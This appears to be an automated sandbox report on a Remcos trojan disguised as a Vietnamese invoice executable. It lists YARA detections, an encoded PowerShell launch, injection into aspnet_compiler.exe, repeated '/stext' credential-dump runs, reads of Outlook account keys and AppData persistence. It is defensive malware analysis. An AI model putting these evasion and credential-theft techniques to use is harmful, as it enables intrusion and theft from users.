Source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00416760 appears 69 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00401806 NtdllDefWindowProc_W, 14_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_004018C0 NtdllDefWindowProc_W, 14_2_004018C0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000000.251222049.0000000000182000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameCgfcxatykt.exe" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameVgnaaeoogibheqcdzitcbxs.dll" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000003.271856566.0000000003772000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVgnaaeoogibheqcdzitcbxs.dll" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Binary or memory string: OriginalFilenameCgfcxatykt.exe" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe File created: C:\Users\user\AppData\Roaming\Yqxsvaorwni
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@65/22@19/5
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 14_2_004182CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 14_2_0040B58D
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe ReversingLabs: Detection: 27%
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Virustotal: Detection: 30%
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe File read: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ubrkswxpfz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\evectoiqthdfs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ivyunzdcvtueoyrjhmkmqwoatvkpua"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xzhdfxk"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\huvvgpvbsu"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\mvrmgcrxgnlvkuc"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\wyeehvbyuvdiuiytom"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe System information queried: HandleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgi0vwrh.uo4.ps1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 14_2_00418758
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, aspnet_compiler.exe, 0000000F.00000002.365717220.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: aspnet_compiler.exe, 0000000E.00000003.395805879.0000000002755000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.418724773.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.444163305.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.475835052.0000000003013000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.500353883.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.511362644.0000000000A53000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 14_2_00413D4C
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-E9KXT7
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\dwn.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\dwn.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 28.2.Shhejayly.exe.36c99b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.381f0c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.7610000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.7610000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.7bd0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.381f0c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.7bd0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.543466399.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.542998195.0000000002653000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.355179401.0000000002596000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.600053448.0000000007BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.551264239.000000000370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271856566.0000000003772000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwn.exe PID: 2088, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Shhejayly.exe PID: 4420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Shhejayly.exe PID: 5608, type: MEMORYSTR
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, Form1.cs .Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
